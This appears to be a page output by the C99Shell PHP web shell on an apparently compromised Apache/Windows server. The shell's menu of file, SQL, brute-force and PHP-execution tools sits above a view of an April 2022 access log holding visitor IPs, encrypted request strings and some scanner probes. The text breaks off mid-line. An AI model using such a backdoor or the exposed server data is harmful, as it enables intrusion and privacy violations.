!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2022.04.11.log (2.07 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
207.46.13.179 - - [11/Apr/2022:00:00:15 -0500] "GET /Publicaciones/2022EE28325.pdf HTTP/1.1" 404 227
172.22.2.4 - - [10/Apr/2022:23:59:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Apr/2022:23:59:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
216.245.221.92 - - [11/Apr/2022:00:02:34 -0500] "HEAD / HTTP/1.1" 200 -
168.121.106.50 - - [11/Apr/2022:00:02:36 -0500] "GET / HTTP/1.0" 200 319
172.22.2.4 - - [11/Apr/2022:00:04:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:00:05:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
216.245.221.92 - - [11/Apr/2022:00:07:34 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:00:10:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [11/Apr/2022:00:12:34 -0500] "HEAD / HTTP/1.1" 200 -
186.102.32.46 - - [11/Apr/2022:00:13:02 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.32.46 - - [11/Apr/2022:00:13:02 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.32.46 - - [11/Apr/2022:00:13:06 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.32.46 - - [11/Apr/2022:00:13:07 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.32.46 - - [11/Apr/2022:00:13:10 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.32.46 - - [11/Apr/2022:00:13:10 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.32.46 - - [11/Apr/2022:00:13:14 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
172.22.2.4 - - [11/Apr/2022:00:11:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
186.102.32.46 - - [11/Apr/2022:00:13:14 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.32.46 - - [11/Apr/2022:00:13:24 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19dpI+alh8sVefopLDrFzIuaydk+eER7LGsyeAw1DmMkOSveckW0e3bMZzZ9asNApuo3RWLYzhTqa9/bWMfjOKBAtNEE7i+sBPrtkobGNKz2r+nTTPexEuc18ba4lwF3D91OdNBpV84zbrsCgMVbIS+As2TKcVRD1t6c2PEivn0EzzLu2TFMaemzEygVmfntPY5tB84pe6suR6XmeLFjTneuIM+kKcpRDrkH352pbgByYlwFhqAaBnPd5TSFw/zxAVUnHCOGpAeSg==&u=U2FsdGVkX1+my3NsZsv9lgnBhgpXovcyIFt+89+Uorw=&y=U2FsdGVkX1+Ey2LRCKNH7gsRU5vDJuLT+Sm+MvPczE+vhT316EMd0mDrLcCg78Cv HTTP/1.1" 200 25
186.102.32.46 - - [11/Apr/2022:00:13:24 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+ejOEQ9z1c4lF4eCud8MmujkvHalgRZRDgEoblfziLtKgWIEF3VNIt86DGizZj21i2XcS7OmfpInwwCNUnkPzDpclmDsX4k2xg/3biz7Bx1GT9k9CDsFhf1tesmEB1nWn4MBbsV9zWQKz8dGWD6IvT4kqbNtvd9wTCnJGpQFfLxSBcFL6b7g29IZTGs8zIkKLwPNHY2GglR+Qbi0WtUdD/DDniJ1pgwRkB+TTJEpOe6DmVJzZzjxtGVprdYBU+j9CawmXQoQMdr30WaQA+q4T/2OycvpcWFvybx9phKrWzzZxWauoJNrhjq+pIO8YO//EUrVFRPySWGCa0cXeevLd6QGS10bef7AE2HuZKq3qIDKRIgzNlCyO1r8OIofOFB/TH+x3jqzS2+YQx0y7rBLq5qXFBuAHVJJWUSfnM/MpNvONcKPA+c6/x00WoxtvORrhzmZvnx/CN2PqCzSSmUEvbOPTWmXDwaNMrpR+bDKGPePIIXxZUY5uqoTGIzIJxCBgPKvk60seAsLRAeVGk7oQoBavMqnq9Sh4P3urFuVynK8NiMzccSP6hVYVqIsCq83dl6diOdF/8u8tVSmfa16MgP0ml4Tv1/LQdnszQVw5P8vTTSHusDkAGu+Yi7yC6E2TroLYtMBJdGMEj1+m79yApgMpQA5sRUCtw2zdIU8NNSNUa6mkohJT3XE9VuHeIelfAFIDpGBS5AXurSXgLXUhIaLnXcJjswo9uox1CuQbEOCDJ7KZWAzMJ6de0ec8a4iYO4NBQE3/L7D1kXfT/7c7kpblaFow1bbve01Ev+tfI3Z4pBk0qpjiAi7toNHCuW0U2ZtckPgrxJuYqgA33h0LsKRDOV2YnIb0dwCPSPeVr00J+uHV+ZrDb670E3ZwA2RvHU88MPIfaduv/YfvZFfKhLXzVz44QPZ4CsyLxQJvcJHVhHDO+40pGuy9VIWtSlXMgl0OBDgFBN3XoSAcTkMsWkH+MuvoSE9WqaghTnFcAcP9ynUOMl3CEbKHrfY6hGfS8SLUvhxIZ8++WEVTjgwnohoD1QgATOzHvKwQBKyDbHsoudyo7RBcjZohCXZgMXCkquEu1xEndWp3qq0UexLrWrCe/EYda0XiBbp3ASMLO6xm6N2mpFfRf9peyc6zr2zFjJgGu2rdg1wCyEgzw4x8Lg0IQV2FjiRpKV7raYKED0JMvLpV65EsJTuwImiFqGXVFCu3CFOvHpRvHfHRmqC+Tt8mO3uXerp8e06at+FrA7Q9NBpereHaRq5VkIspBQRUo5u5pwm7gSPrAyJDhYNVeRXQe+UfaMuwHufaAf/IA4TliZ0SoeimqMtEihE9JWAc2/vW6WHfiGGVuB6vXHriR//xjtxtIPJODEz6/A9DDyOoeh7W6IRosa39WzQEuG65tFn4d+BnQTmp2+ol/vAsEZzPhFAi5j/xsY0g3hbBTL0BmCodd4xTG7rkktpvhVQSf39rUJdjYXwMnoe1eeOwUHcYhSZnPJryhO8oY4ynvzljTppjsEnlZw7If9H9FMZ72cQY7T2/t5XCiFVv0FLDbM/G2tA8inFZde5IC3cxTAn9aS6ljDhEB1LqrWfTKRyocsxeqZqIRCg==&u=U2FsdGVkX1+my3NsZsv9lgnBhgpXovcyIFt+89+Uorw=&y=U2FsdGVkX1+Ey2LRCKNH7gsRU5vDJuLT+Sm+MvPczE+vhT316EMd0mDrLcCg78Cv HTTP/1.1" 200 25
186.102.32.46 - - [11/Apr/2022:00:13:24 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX189rpdfrxZ6cNTwgxmJugkmD7iopXaHyAuF4qbeYd0/jgDunm/9S9Lg+H6x0+e4Vp0cbtK6kNzXftp9dzEHa+OT5UwjDinS7HUQbqUaLf+n1rY3FeavzTWxHdSDdhkJFCDPdTuhCs3fvKluYxuXP4Nk4KkdKZ3VuIs=&u=U2FsdGVkX1+my3NsZsv9lgnBhgpXovcyIFt+89+Uorw=&y=U2FsdGVkX1+Ey2LRCKNH7gsRU5vDJuLT+Sm+MvPczE+vhT316EMd0mDrLcCg78Cv HTTP/1.1" 200 25
186.102.32.46 - - [11/Apr/2022:00:13:24 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+6Lr+XShhmxuDGfiTBt1toNgV7ZF+ZkjrSiHxw20lkEEyDS4gWupdrnejijC1eLhFSL5mLWkXU2cixKOdqNnR2/JjeSmo9AJg0gucPjUd7Pzkkwy6MhUogiDbldKHYrwWFE/tpcElkFZKMgNX0NDJ8ACiNEb7DFzg=&u=U2FsdGVkX1+my3NsZsv9lgnBhgpXovcyIFt+89+Uorw=&y=U2FsdGVkX1+Ey2LRCKNH7gsRU5vDJuLT+Sm+MvPczE+vhT316EMd0mDrLcCg78Cv HTTP/1.1" 200 25
186.102.32.46 - - [11/Apr/2022:00:13:25 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19aQjXJiNqbv1x8pJDr5K1ttCapvU/cCU+hdPVwrgyhYgPJeb2OpzdY/zfnPg93B5uxwFs7allXE1K6mjCtxX6DGXeWwJDZkk9PfVnTeLGBxSOs3Ur7r4RMTHtqsEyT+OPiFNuYCsqFyBf8pxhwWn0AOUrXwDT78TY=&u=U2FsdGVkX1+my3NsZsv9lgnBhgpXovcyIFt+89+Uorw=&y=U2FsdGVkX1+Ey2LRCKNH7gsRU5vDJuLT+Sm+MvPczE+vhT316EMd0mDrLcCg78Cv HTTP/1.1" 200 25
186.102.32.46 - - [11/Apr/2022:00:13:25 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19CCeE5ueuIuoZcsqFnK38lUBXhZeuyuyprc5if2ZJJQIwf1BROJhTakWQNG+LLmldGGaNYloIn9ulU6wiKr6JdJ3Jnk0h+PlNUXhYbm+SGHCib3/ciiUEqLYH86Nx9T9XWFBXfFJIsm4QhDV/2Ku6T10SxuXrG6YiYCZQU5qpbguSwgJ15hf4V&u=U2FsdGVkX1+my3NsZsv9lgnBhgpXovcyIFt+89+Uorw=&y=U2FsdGVkX1+Ey2LRCKNH7gsRU5vDJuLT+Sm+MvPczE+vhT316EMd0mDrLcCg78Cv HTTP/1.1" 200 25
186.102.32.46 - - [11/Apr/2022:00:13:25 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19Hw9/DjGQiu0ZyhSk4iGXszQuTinHAomxDFVLD9ir5YE/++A6vQOlQcEFLWyZPbIzatazBXZAJ3ERNrQ7cmWr9gYRYBWHsBsT142JmIbBjzNT/UozVCwlsDT9VIt7ZLHCuPMapBOm7P1yaOqBx0WH4UyZ/jtbk08fcyJlnz2ICoybKptSy9XI6vMWpmD6Fsf/Xlg3RZ4qITg==&u=U2FsdGVkX1+my3NsZsv9lgnBhgpXovcyIFt+89+Uorw=&y=U2FsdGVkX1+Ey2LRCKNH7gsRU5vDJuLT+Sm+MvPczE+vhT316EMd0mDrLcCg78Cv HTTP/1.1" 200 25
186.102.32.46 - - [11/Apr/2022:00:13:25 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1918/Ty0xxGc5Go5HV2VOkq/V6oJ2LeuQa5NGw/7J8pFnw8WCxvsJBS+wSupqTfveR9xyk21un+crygH5eMtCoDpgMfzbGnXj48JmibbDc7KG85NkMbexzvz98sU8M1WpWMHzSLmSCMs6ieijOje6elslwRSxfJkVZ6WwMxhry8wQ1BbLIHcz1c&u=U2FsdGVkX1+my3NsZsv9lgnBhgpXovcyIFt+89+Uorw=&y=U2FsdGVkX1+Ey2LRCKNH7gsRU5vDJuLT+Sm+MvPczE+vhT316EMd0mDrLcCg78Cv HTTP/1.1" 200 25
186.102.32.46 - - [11/Apr/2022:00:13:26 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18OJv3tzqXtOTuwducuenq8t90FN83t7PYgK6fvz61WdWZIIPytnGwzJI3I6T0Sg8fKDw6e04AccUIIWeFfCZqn6Y2PxD993vW6yDqFNm6CxPUN44hSRbySNcaWj0/VtoCIpHyNfatiN5Ip4XidzXVbG7UMI3xx4ZFLNiplMtgpCjjLs4NStqgsnApkr633DLsMxoGHuO+qPg==&u=U2FsdGVkX1+my3NsZsv9lgnBhgpXovcyIFt+89+Uorw=&y=U2FsdGVkX1+Ey2LRCKNH7gsRU5vDJuLT+Sm+MvPczE+vhT316EMd0mDrLcCg78Cv HTTP/1.1" 200 25
186.102.32.46 - - [11/Apr/2022:00:13:26 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+MV3E2eoT3MQXVjXx8TetPPRj9tcbRWwRbFtfGIe+lK+7VVj8aHLSyGPPTg2Yh0x8IQR03Zv1NadWbgg+lZxkk4A64Miqs1decno4MjMfc26I+pKTWPqcgKp+ghyHkoP9Lou0VzM4GtC3LDaxgHJeKGtwFHjCOELz2C4C/9br5O8ANStsZRCbU&u=U2FsdGVkX1+my3NsZsv9lgnBhgpXovcyIFt+89+Uorw=&y=U2FsdGVkX1+Ey2LRCKNH7gsRU5vDJuLT+Sm+MvPczE+vhT316EMd0mDrLcCg78Cv HTTP/1.1" 200 25
186.102.32.46 - - [11/Apr/2022:00:13:26 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/iuaT1b9Sc0mp1fezEzg1KunQAwPE+cLR+btbuyb6Q5WYckwbDG8MCn2zcTxbr3eHYCeL9Ng07QZoqZt/dgDFfIouLxRNOfdhyGztgs8ULHuID3iGhypI3Xo1LGR8zVhzhKbuECThJNjlOzK8zLAUrw96mb3/xy3rVRzvkqHOJCo/jF5zgb1aEdSE3/y5+yAuGwfg4YK8Ixg==&u=U2FsdGVkX1+my3NsZsv9lgnBhgpXovcyIFt+89+Uorw=&y=U2FsdGVkX1+Ey2LRCKNH7gsRU5vDJuLT+Sm+MvPczE+vhT316EMd0mDrLcCg78Cv HTTP/1.1" 200 25
186.102.32.46 - - [11/Apr/2022:00:13:26 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+tIVbKimE5ttfCWbyz2OAgGyNCObYeBDcVZKSTxWNUZYeIQ+dmvcsxlHKTmysUvWz9grMQTfmXvYykc0RE9NVLj9mzGPHvRKoS4dJIOPUYUbocRWWZ5HEjYaswfVC4TWBA/lo5ievr6S3dZglhUQRBfyDwba24Q1gvmx0IBjOV8Ok4Swk8oe15&u=U2FsdGVkX1+my3NsZsv9lgnBhgpXovcyIFt+89+Uorw=&y=U2FsdGVkX1+Ey2LRCKNH7gsRU5vDJuLT+Sm+MvPczE+vhT316EMd0mDrLcCg78Cv HTTP/1.1" 200 25
186.102.32.46 - - [11/Apr/2022:00:13:26 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+FKMeD4QchhjMlsWKz1T7qOaKr4uXLoMMd8WxynNUrZdLYC9F4nJ1+I/tqr6SF7RAQa+qfg7rg3BDrrAd0GQ6r2kXb3/1bEUmWTld9oN19f+Rrv9h4gGXXg+jscfuXFoGvKuSpatVldewuCNMFdNBbk2x2BjCS/6khLj13mHz65ZtQn4D3okl4WdVlqPW0JSXogOs53fQe8A==&u=U2FsdGVkX1+my3NsZsv9lgnBhgpXovcyIFt+89+Uorw=&y=U2FsdGVkX1+Ey2LRCKNH7gsRU5vDJuLT+Sm+MvPczE+vhT316EMd0mDrLcCg78Cv HTTP/1.1" 200 25
186.102.32.46 - - [11/Apr/2022:00:13:27 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX194yv/8f7B/7pdeflxllYx0ULzNB/M8KvlOAbQKK65FqpA0QXmPQ2oC6iw7B5IbB2PI282HtVWu0sZVK9gxc/uYVqsI/p5REjhb9GZkpdvF/5AV6lA6J7PnqJI8JtM5POh67Hzr/9/iFCqrx8VwvhWwEssOp3ATIQBXfDGA9R81s+YyLaUxAgAf&u=U2FsdGVkX1+my3NsZsv9lgnBhgpXovcyIFt+89+Uorw=&y=U2FsdGVkX1+Ey2LRCKNH7gsRU5vDJuLT+Sm+MvPczE+vhT316EMd0mDrLcCg78Cv HTTP/1.1" 200 25
186.102.32.46 - - [11/Apr/2022:00:13:27 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+sfhpmt73LErM/CBRxj4ZJxLaKC+9ihTBDjEzLJG1x+6nxkamLc9t+ZCAWHRwSuzwQsxZi2Xt0K30CIUEAma9ec64WPI4aqeEl3B8mzjrNk17YInqgGGEPsw/Xm/t8D9Yui73VdINwNWzoLBkCOVXjNM7FVxWUxpX7A9+YRPpEbDpsZBNize6ffgo7N37VOJw04IM0zLHLWw==&u=U2FsdGVkX1+my3NsZsv9lgnBhgpXovcyIFt+89+Uorw=&y=U2FsdGVkX1+Ey2LRCKNH7gsRU5vDJuLT+Sm+MvPczE+vhT316EMd0mDrLcCg78Cv HTTP/1.1" 200 25
186.102.32.46 - - [11/Apr/2022:00:13:27 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/SQgL4OMsys2Piofui4eDFDHOLXajbiJrvR00vQ0JCZNfuNSugn19GkmaK5vgPeomvxEonR3MpFMmIOD1T2C4aXaKSvoX3946zMP5AWI8TIcZylLkxGkIwL4P0JSx3d0qTBc6+EA+XU6oh1lYDkwFvXj0w32GG2AN8phOaQlsKDP2xsx0f7Aw9&u=U2FsdGVkX1+my3NsZsv9lgnBhgpXovcyIFt+89+Uorw=&y=U2FsdGVkX1+Ey2LRCKNH7gsRU5vDJuLT+Sm+MvPczE+vhT316EMd0mDrLcCg78Cv HTTP/1.1" 200 25
66.249.65.13 - - [11/Apr/2022:00:13:46 -0500] "-" 408 -
152.61.192.232 - - [11/Apr/2022:00:16:56 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [11/Apr/2022:00:17:34 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:00:16:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:00:17:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53739
152.61.128.50 - - [11/Apr/2022:00:20:49 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [11/Apr/2022:00:22:33 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.157 - - [11/Apr/2022:00:22:42 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 342490
201.245.192.253 - - [11/Apr/2022:00:22:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45271
190.26.42.197 - - [11/Apr/2022:00:23:54 -0500] "GET /caminos-de-los-cerros-habilitados-en-esta-semana-santa-2022.html?fbclid=IwAR3Q1NTPWiT-zd8XxEyl8RlYxVvcj9dYzfmzEjqZV2sN-JEV8F7G3VD8Wz0 HTTP/1.1" 200 832
172.22.2.4 - - [11/Apr/2022:00:22:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [11/Apr/2022:00:23:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45444
120.86.238.109 - - [11/Apr/2022:00:24:18 -0500] "POST /HNAP1/ HTTP/1.0" 400 945
172.22.2.4 - - [11/Apr/2022:00:23:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
17.121.115.207 - - [11/Apr/2022:00:25:42 -0500] "-" 408 -
45.155.204.146 - - [11/Apr/2022:00:27:15 -0500] "GET /actuator/gateway/routes HTTP/1.1" 404 1018
216.245.221.92 - - [11/Apr/2022:00:27:34 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:00:28:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:00:29:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
216.245.221.92 - - [11/Apr/2022:00:32:33 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Apr/2022:00:32:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45271
201.245.192.253 - - [11/Apr/2022:00:33:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45444
172.22.2.4 - - [11/Apr/2022:00:34:35 -0500] "GET /BLA/boletinlegal/aaa9 HTTP/1.1" 404 1018
172.22.2.4 - - [11/Apr/2022:00:34:36 -0500] "GET /BLA/boletinlegal/aab9 HTTP/1.1" 404 1018
172.22.2.4 - - [11/Apr/2022:00:34:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:00:34:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
40.94.29.24 - - [11/Apr/2022:00:36:55 -0500] "GET /en-semana-santa-no-uses-palmas-ni-traigas-o-consumas-animales-silvestres.html HTTP/1.1" 200 959
216.245.221.92 - - [11/Apr/2022:00:37:33 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.15 - - [11/Apr/2022:00:37:46 -0500] "-" 408 -
49.7.21.74 - - [11/Apr/2022:00:39:47 -0500] "-" 408 -
172.22.2.4 - - [11/Apr/2022:00:39:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:00:40:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
216.245.221.92 - - [11/Apr/2022:00:42:33 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Apr/2022:00:42:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45271
201.245.192.253 - - [11/Apr/2022:00:43:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45444
172.22.2.4 - - [11/Apr/2022:00:45:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [11/Apr/2022:00:47:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:00:46:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
34.91.116.36 - - [11/Apr/2022:00:50:11 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [11/Apr/2022:00:52:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:00:51:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:00:52:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
186.29.81.144 - - [11/Apr/2022:00:55:53 -0500] "GET /BLA/resoluciones/index.php?dir= HTTP/1.1" 200 13093
186.29.81.144 - - [11/Apr/2022:00:56:11 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2014%2F HTTP/1.1" 200 331128
190.84.108.224 - - [11/Apr/2022:00:57:09 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
190.84.108.224 - - [11/Apr/2022:00:57:09 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
190.84.108.224 - - [11/Apr/2022:00:57:10 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
190.84.108.224 - - [11/Apr/2022:00:57:10 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
190.84.108.224 - - [11/Apr/2022:00:57:12 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
190.84.108.224 - - [11/Apr/2022:00:57:12 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
190.84.108.224 - - [11/Apr/2022:00:57:12 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2013%2F HTTP/1.1" 200 405472
190.84.108.224 - - [11/Apr/2022:00:57:17 -0500] "GET /BLA/resoluciones/AUTOS%202013/0030.pdf HTTP/1.1" 200 1900292
190.84.108.224 - - [11/Apr/2022:00:57:24 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
190.84.108.224 - - [11/Apr/2022:00:57:27 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2013%2F HTTP/1.1" 200 405472
216.245.221.92 - - [11/Apr/2022:00:57:33 -0500] "HEAD / HTTP/1.1" 200 -
190.84.108.224 - - [11/Apr/2022:00:57:35 -0500] "GET /BLA/resoluciones/AUTOS%202013/0189.pdf HTTP/1.1" 200 2839560
190.84.108.224 - - [11/Apr/2022:00:57:39 -0500] "GET /BLA/resoluciones/AUTOS%202013/0189.pdf HTTP/1.1" 304 -
190.84.108.224 - - [11/Apr/2022:00:57:39 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
190.84.108.224 - - [11/Apr/2022:00:57:41 -0500] "GET /BLA/resoluciones/AUTOS%202013/0189.pdf HTTP/1.1" 304 -
207.46.13.157 - - [11/Apr/2022:00:57:45 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 342490
190.84.108.224 - - [11/Apr/2022:00:57:48 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
190.84.108.224 - - [11/Apr/2022:00:57:51 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2013%2F HTTP/1.1" 200 405472
190.84.108.224 - - [11/Apr/2022:00:58:11 -0500] "GET /BLA/resoluciones/AUTOS%202013/0189.pdf HTTP/1.1" 304 -
172.22.2.4 - - [11/Apr/2022:00:57:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:00:58:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
190.84.108.224 - - [11/Apr/2022:01:01:16 -0500] "GET /BLA/resoluciones/AUTOS%202013/0189.pdf HTTP/1.1" 304 -
190.84.108.224 - - [11/Apr/2022:01:01:20 -0500] "GET /BLA/resoluciones/AUTOS%202013/0189.pdf HTTP/1.1" 304 -
190.84.108.224 - - [11/Apr/2022:01:01:26 -0500] "GET /BLA/resoluciones/AUTOS%202013/0189.pdf HTTP/1.1" 304 -
216.245.221.92 - - [11/Apr/2022:01:02:33 -0500] "HEAD / HTTP/1.1" 200 -
45.143.200.118 - - [11/Apr/2022:01:03:39 -0500] "\x03" 400 226
172.22.2.4 - - [11/Apr/2022:01:03:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:01:04:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
168.151.240.44 - - [11/Apr/2022:01:07:11 -0500] "GET /en-semana-santa-no-uses-palmas-ni-traigas-o-consumas-animales-silvestres.html HTTP/1.1" 200 959
216.245.221.92 - - [11/Apr/2022:01:07:33 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.15 - - [11/Apr/2022:01:08:46 -0500] "-" 408 -
40.77.167.46 - - [11/Apr/2022:01:09:08 -0500] "GET /BLA/resoluciones/AUTOS%202018/4357.pdf HTTP/1.1" 304 -
207.46.13.179 - - [11/Apr/2022:01:09:40 -0500] "GET /forest/ HTTP/1.1" 200 12041
172.22.2.4 - - [11/Apr/2022:01:09:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.29.111.88 - - [11/Apr/2022:01:10:46 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/W/s3YAvoxrG4uTZU8NheGxm2fzAMlMh40bp6Mgf7jQgKJRUliIKfi&y=U2FsdGVkX19DRKmA7YScCGquq1VgQDCCIwBsWY0qu0StyA8tIXFlUyD9nVQgpaYi HTTP/1.1" 200 30
186.29.111.88 - - [11/Apr/2022:01:10:46 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18DvR0z9kEUBnnh7JIAaT0JirpWgX0sogIL1RgelnXHCOm+dQsQmlGIIg/ebnlshJkFwM48Okq13AJN1CPvcXNngCMChvH+QMA=&u=U2FsdGVkX1/O3hh2ngzYvmpSiNwyZSD9bthbO5XCwg2Jg9Qu1xWWyuL1e0dawjmi&y=U2FsdGVkX19DRKmA7YScCGquq1VgQDCCIwBsWY0qu0StyA8tIXFlUyD9nVQgpaYi HTTP/1.1" 200 97
186.29.111.88 - - [11/Apr/2022:01:10:46 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19rrTTPrAZTm7Knor8LfkKhTr1MkIvO9UUJheIocnQ4LTY9VgNlU7HwQDQ+7/f74tqi8Xb5PE1r2miivO7HgKz82xkwJPDgfC8y3aEzpQKZWklKdrurBGdHNhoG6tkBB3QLZ0I/SDiUlamG7r2rY4w5KTTzJAgG2IWiNXOCc4k2PPxBLap2LmEpFlpWpuE8CCl1byRa83gu9HMQEuHsi8WZqrz0L4qiJF1hB8AUP6cvSVLNbh9XhMp7K9yYlHom64k1Yb+c6bj+hf5xyw02CpmzVKc1UIZrE2SRE3evQWdSEozAmxKB1ze7xECjdBlLvJ1uZGGERtRew8RdJP262i4keOl8DZi1TeLJ+VfR37sKzc1mry3IV9xLCeS6tPqmhhERu00LS18bCWjcnKPkSAPFj0sSEC/xBLRaihtrB0fl+UOumJCYAja47LEino8kwjB+/zcMwkWQGDP/06GsNy0uiuyWbH+hiKxUsJ392zfBi2UeV1NNcMCWE+Vt25NgiOy6CCElrkxdNFsw7Sw/I2xDTjMmHxF96JPgRmxTZrJ5SfEmYnIJv0UG/ViRHAPXjP+4zRiLvRlACeHATQR8FlXMT/+eLyVwIn+PxVrM8aEeqtQb8f42B6vi4FhRSnayno4hlGpzgiM4DJw3OkOOWs635lrW0NRwmpnEqIWSA1rlz0UudKGi4xcDYxx8ks4SFeC2bvOEXyUZMdmO9UtaaJExLh1yDn/qU8nGMz6EkP/T+4dpetRrqCK2+gi+OhY6SMRgkhQ2pVKiDLYmChocV5WPu+s9su93zN+cwzynl0v7LtGXciZduxWCTPdbIDy8PGLL1C33U1/3U1OC/f/eTjguqhNWCIDaMJ